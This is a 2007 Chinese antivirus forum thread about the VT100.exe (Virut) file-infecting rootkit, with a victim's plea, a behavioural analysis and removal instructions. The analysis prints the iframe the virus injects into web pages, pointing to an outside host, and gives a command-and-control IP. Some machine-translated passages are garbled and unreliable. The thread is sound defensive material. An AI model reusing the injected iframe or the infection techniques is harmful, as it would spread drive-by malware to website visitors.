zcwy
新手上路
积分 6
发帖 6
注册 2007-4-3
|
#1 新病毒:VT100.EXE
启动系统进不了桌面,调出任务管理器运行C:\windows\explorer.exe 进桌面...
所有的EXE感染病毒..
我在网上搜索的这位网友和我的情况一样:身负巨毒,上网求助。
1,在断网情况下,新装了上海版的系统后,用xyboys写的导入工具将4月6日的病毒库导入未激活的卡巴,然后查杀c盘,无任何病毒,但是一上网后卡巴就连续报毒,主要是以下几个。
windows\system32\netsh.exe virus.win32.virut.e
windows\system32\conime.exe virus.win32.virut.e
windows\system32\taskmgr.exe virus.win32.virut.e
windows\system32\dwwin.exe virus.win32.virut.e
windows\system32\drwtsn32.exe virus.win32.virut.e
windows\explorer.exe 这个怎么报的我忘记了,但是这个文件绝对是系统自带的啊
windows\system32\vt100.exe 风险软件
在未连网时卡巴就没报,一切正常,但是一连上这些文件就被报出来了,请问这是为什么? 以上几个运行程序的作用是啥? 希望高手能简单讲解一下
2,我在cdbest论坛下的nero7,其keygen7.exe , 和yaoyuan.com下的星际1.14硬盘版补丁等我认为没有问题的文件被暴毒,我将其设到信任区域里后,卡巴仍然时不时的报毒( 病毒 typc_win32(修改) ),然后双击无法运行了,这些文件我是一定要用的啊。
这种情况该如何解决啊?
3,我把taskmgr.exe清除以后,任务管理器就吊不出来了,这该如何解决啊??我不想在恢复系统了。
4,一旦上网后,病毒就发作了,接连感染、寄生在explorer.exe,iexplor.exe,notepad,msmsgs等重要执行文件内,不杀不行,一杀系统就受影响甚至崩溃,所以我想把
主动防御-程序完整性保护内的关键程序全部设为 阻止内容修改 ,不知道这样行不?
除此之外还有什么办法防止病毒对我的重要执行文件的修改,我的卡巴网络套装是更新到最新的病毒库了啊,为什么还会这样。。。
小弟刚买了卡巴一个星期,对病毒知识一点不了解,正在恶补中,但时间又很有限,希望高手不吝赐教,谢谢。
| |
※ ※ ※ 本文纯属【zcwy】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
 |
|
2007-4-13 16:47 |
|
zcwy
新手上路
积分 6
发帖 6
注册 2007-4-3
|
#2
一位网友的分析!!!!
今天从某个网友那里获得了一个病毒 据说是感染文件的 卡巴报为Virus.Win32.Virut.e(瑞星还不能查杀)
看病毒名估计是一个新的感染exe系列的变种
病毒文件名 VT100.exe
病毒大小 125952字节
MD5 35703ea7c752d959d2e9d904654a5522
编写语言 Delphi
此病毒特征:1.感染exe(包括系统分区)html htm php asp aspx 文件
2.结束一些杀毒软件进程
3.删除hosts文件
4.通过hook API函数 隐藏进程 隐藏文件自身及注册表中的启动项目
5.删除gho文件
总体上来看有点步李俊的后尘哦!
运行文件后
生成如下文件
C:\Windows\system32\VT100.exe
Hook 以下API函数Ntcreatefile
Ntcreateprocess
NtcreateprocessEx
NtEnumerateValueKey
NtQueryDirectoryFile
NtQuerySystemInformation
ZwCreateFile
ZwCreateprocess
ZwCreateprocessEx
ZwEnumerateValueKey
ZwOpenFile
ZwQueryDirectoryFile
使得C:\Windows\system32\VT100.exe在资源管理器下不可见
其进程在任务管理器中也不可见
后面提到的启动项目 在注册表编辑器中也不可见
注册表方面
添加HKLM\SOFTWARE\Microsoft\Tracing\FWCFG键
并在其下建立值
HKLM\SOFTWARE\Microsoft\Tracing\FWCFG\EnableFileTracing: 0x00000000
HKLM\SOFTWARE\Microsoft\Tracing\FWCFG\EnableConsoleTracing: 0x00000000
HKLM\SOFTWARE\Microsoft\Tracing\FWCFG\FileTracingMask: 0xFFFF0000
HKLM\SOFTWARE\Microsoft\Tracing\FWCFG\ConsoleTracingMask: 0xFFFF0000
HKLM\SOFTWARE\Microsoft\Tracing\FWCFG\MaxFileSize: 0x00100000
HKLM\SOFTWARE\Microsoft\Tracing\FWCFG\FileDirectory: "%windir%\tracing"
用意不懂 不过感觉应该和不断的停止防火墙的程序有关
我的瑞星防火墙就是被他不断的停止...
在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下面增加名称为VT100 Emulator的键值
指向 C:\Windows\system32\VT100.exe达到开机自启动的目的
删除C:\WINDOWS\system32\drivers\etc\hosts
和gho文件
如果有如下进程则结束
sfmantec antipirus(作者拼错了吧?呵呵)
ravmon.exe
zonealarm
rav_onclass
感染系统分区 (包括C:\WINDOWS\system32\dllcache\下面的文件)及其他分区的exe文件
使得被感染文件增加9728字节的内容
感染感染系统分区 (包括C:\WINDOWS\system32\dllcache\下面的文件)及其他分区的html htm php asp aspx 文件
在其内部添加如下代码
<iframe src="http://www.zief.pl/iraq.jpg" width=1 height=1></iframe></body>
通过winlogon进程访问81.95.149.98:65520 可没找到插入winlogon的 dll ..
| |
※ ※ ※ 本文纯属【zcwy】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
|
|
|
2007-4-13 16:49 |
|
Legend
超级版主
超级版主
积分 77171
发帖 70170
注册 2005-10-29
|
|
|
2007-4-13 16:52 |
|
zcwy
新手上路
积分 6
发帖 6
注册 2007-4-3
|
#4
病毒已打包发送!!!
| |
※ ※ ※ 本文纯属【zcwy】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
|
|
|
2007-4-13 17:02 |
|
Legend
超级版主
超级版主
积分 77171
发帖 70170
注册 2005-10-29
|
|
|
2007-4-13 17:04 |
|
zcwy
新手上路
积分 6
发帖 6
注册 2007-4-3
|
#6
已发送,请查收!
| |
※ ※ ※ 本文纯属【zcwy】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
|
|
|
2007-4-13 17:08 |
|
zcwy
新手上路
积分 6
发帖 6
注册 2007-4-3
|
#7
再看一位网友的分析:
实在是郁闷,这几天中毒 VT100.EXE 怎么都杀不掉.清除后重启还是有...
(请注意:如果系统有提示VT100.EXE修改注册表时 一定不要让它通过..)
在网上找到的相关资料太少了,也不知道什么时候这些杀毒软件可以把它(VT100.EXE)干掉
网上大多都是说用冰刃和文件粉碎器来清除这个病毒,我这样做了可是行不通..
到现在系统免强还能爬行. 每次开机就要先开冰刃把VT100.EXE过程关掉.不关掉他就会连线网络下载不知名的邮件,而且数量很多..
该病毒分为两部分:
1) vt100.exe ( 50 kB EXE ) - hidden process
认证授权1)vt100.exe(50字节)--隐藏进程
2) code of about 8 kB which is used to infect EXE files.2)
约8千字节代码是用来感染可执行文件.
3) it also tries to connect to some IP.3)
有的还试图连接的IP.
--------------------------------------------------------------
简介:
VT100.EXE is a rootkit virus that hides its process and executable files having it undetected by AntiVirus software.vt100.exe
是Rootkit的病毒隐藏其进程和可执行文件的情况下,它具有反病毒软件. It also infects .exe and .scr files.它也感染.认证及.可控硅档案.
Technical Name: VT100.EXE (Rootkit)
技术名称:vt100.exe(Rootkit的)
Threat Level: Medium
威胁程度:中等
Type: Virus
类型:病毒
Systems Affected: Windows All
受影响系统:所有窗口
VT100.EXE (Rootkit) removal procedure requires technical know-how on computer troubleshooting. It is better to consult your
LAN Administrator or Technical Persons to avoid additional damage on your computer if modifications on Services and Registry
have to be done.
HOW TO REMOVE VT100.EXE (Rootkit) :
1. Temporarily disable System Restore (Windows Me/XP).
2. Update the virus definitions.
3. Reboot computer in SafeMode
4. Run a full system scan and delete all infected files.
5. In order to make sure that threat is completely eliminated from your computer, carry out a full scan of your computer
using AntiVirus and Antispyware Software. Another way to delete the virus using various Antivirus Program without the need to
install can be done with Online Virus Scanner.
---------------------------------------------------------------
你看,病毒Rootkit的隐藏其进程,档案和档案关键.
启动后,几乎所有档案感染vt100.exe一切盘.
ircboot(cmd.exe感染档案)正在试图从偏远档案下载vt100.exe主办.
-----------------------------------------------------------------
病毒/Rootkit的vt100.exe
* hides its process and executable file
隐藏其进程和可执行文件
* injects its code to every created process
每个代码注入其制造过程
* infects most executable files on ALL disks, enlarging files by 5120 or 8192 bytes.
大多数感染所有可执行文件盘、扩大到5120或8192字节档案.
* if the executable file is not infected, it is modified during the launch ( *.EXE, *.SCR )
如果不是感染可执行文件,它是在发射改装(*可执行,可控硅*)
* infected file (process) connects to some host and tries to download rootkit file : VT100.EXE
受感染的档案(工艺)主办,并试图连接某些Rootkit的档案下载:vt100.exe
* after the VT100.exe is downloaded, it starts massive infection of *.EXE files
vt100.exe是下载
这个病毒,目前有个解决的办法,不过比较残忍!
解决方法如下:
恢复系统,ghost或者全新安装!
不要打开任何程序,呆系统启动成功后,点开始/查找
然后删除除系统盘(一般是c盘)所有的exe的文件!
然后重新整理自己的资料!
自己备份的很多程序啊,驱动啊,都没了,实在没好的办法……
试试吧
| |
※ ※ ※ 本文纯属【zcwy】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
|
|
|
2007-4-13 17:09 |
|
我
中级用户
积分 393
发帖 378
注册 2006-7-30
|
#8 http://www.gmer.net/vt100.exe.php
如果有 删除这些注册表项目:
删除这些注册表项目:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
<333><C:\Syswm1i\svchost.exe> [N/A]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<ltnward><; C:\WINDOWS\system32\ltnward.exe> [N/A]
<SoundService><rundll32.exe "C:\WINDOWS\system32\sfnwlufn.dll",setvm> [N/A]
<winform><C:\WINDOWS\winform.exe> [N/A]
<mppds><C:\WINDOWS\mppds.exe> [N/A]
<upxdnd><C:\DOCUME~1\ADMINI~1.47D\LOCALS~1\Temp\upxdnd.exe> [N/A]
<wsttrs><C:\WINDOWS\wsttrs.exe> [N/A]
<msccrt><C:\WINDOWS\msccrt.exe> [N/A]
<cmdbcs><C:\WINDOWS\cmdbcs.exe> [N/A]
<VT100 Emulator><C:\WINDOWS\system32\VT100.EXE> [N/A]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
<{B187090E-3630-4961-BB2A-813C4FDE56EF}><C:\WINDOWS\system32\khffggg.dll> [N/A]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\fade]
<WinlogonNotify: fade><C:\WINDOWS\system32\Lntma32t.dll> [N/A]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\gebcb]
<WinlogonNotify: gebcb><C:\WINDOWS\system32\gebcb.dll> [N/A]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\khffggg]
<WinlogonNotify: khffggg><khffggg.dll> [N/A]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\rpcc]
<WinlogonNotify: rpcc><C:\WINDOWS\system32\rpcc.dll> [N/A]
删除这两个服务:
[Windows SystemDown / WindowsDown][Stopped/Auto Start]
<C:\WINDOWS\system32\servet.exe><N/A>
[Client IP-IPX / Client IP-IPX][Stopped/Auto Start]
<"C:\WINDOWS\system32\svchosts.exe" -e te-110-12-0000122><N/A>
删除这三个驱动程序:
[EXAMPLE / EXAMPLE][Stopped/System Start]
<\??\C:\WINDOWS\system32\main.sys><N/A>
[kgofogl / kgofogl][Running/Boot Start]
<\SystemRoot\\SystemRoot\System32\drivers\kgofogl.sys><N/A>
[Runtime / Runtime][Running/Manual Start]
<\??\C:\WINDOWS\System32\drivers\runtime.sys><N/A>
删除这些浏览器加载项:
[]
{0676624D-2467-4400-A629-C97AB2F3C368} <C:\WINDOWS\system32\gebcb.dll, N/A>
[]
{57E218E6-5A80-4f0c-AB25-83598F25D7E9} <C:\WINDOWS\system32\wogpyhvx.dll, N/A>
[]
{B187090E-3630-4961-BB2A-813C4FDE56EF} <C:\WINDOWS\system32\khffggg.dll, N/A>
[]
{0676624D-2467-4400-A629-C97AB2F3C368} <C:\WINDOWS\system32\gebcb.dll, N/A>
[]
{57E218E6-5A80-4F0C-AB25-83598F25D7E9} <C:\WINDOWS\system32\wogpyhvx.dll, N/A>
[]
{B187090E-3630-4961-BB2A-813C4FDE56EF} <C:\WINDOWS\system32\khffggg.dll, N/A>
结束进程:
C:\WINDOWS\system32\VT100.EXE
删除文件:
C:\WINDOWS\system32\VT100.EXE
重启后删除文件:
C:\WINDOWS\system32\gebcb.dll
C:\WINDOWS\system32\khffggg.dll
C:\WINDOWS\system32\jkkklif.dll
C:\WINDOWS\system32\Lntma32t.dll
C:\WINDOWS\system32\sfnwlufn.dll
C:\WINDOWS\system32\winform.dll
C:\WINDOWS\system32\mppds.dll
C:\WINDOWS\system32\msccrt.dll
C:\WINDOWS\system32\cmdbcs.dll
C:\Documents and Settings\ADMINI~1.47D\Local Settings\Temp\upxdnd.dll
C:\WINDOWS\system32\wogpyhvx.dll
C:\Syswm1i\svchost.exe
C:\WINDOWS\system32\ltnward.exe
C:\WINDOWS\winform.exe
C:\WINDOWS\mppds.exe
C:\Documents and Settings\ADMINI~1.47D\Local Settings\Temp\upxdnd.exe
C:\WINDOWS\wsttrs.exe
C:\WINDOWS\msccrt.exe
C:\WINDOWS\cmdbcs.exe
C:\WINDOWS\system32\rpcc.dll
C:\WINDOWS\system32\servet.exe
C:\WINDOWS\system32\svchosts.exe
C:\WINDOWS\system32\main.sys
C:\WINDOWS\System32\drivers\kgofogl.sys
C:\WINDOWS\System32\drivers\runtime.sys
可以使用IceSword辅助操作 重装比较简单 你早装微点就没事了
[ Last edited by 我 on 2007-4-14 at 00:00 ]
| |
※ ※ ※ 本文纯属【我】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
☆..°∴ ☆☆☆ °°★°°°. ★∴°.°. ☆°☆☆.° |
|
|
|
2007-4-13 23:58 |
|
Legend
超级版主
超级版主
积分 77171
发帖 70170
注册 2005-10-29
|
|
|
2007-4-14 15:43 |
|
408983504
银牌会员
此用户已被禁言
积分 1271
发帖 1238
注册 2007-1-6
来自 广东
|
#10
这个年代网络多病毒啊
要多加小心啊
| |
※ ※ ※ 本文纯属【408983504】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
三用户版续费真TM的便宜啊! |
|
|
|
2007-4-14 22:52 |
|
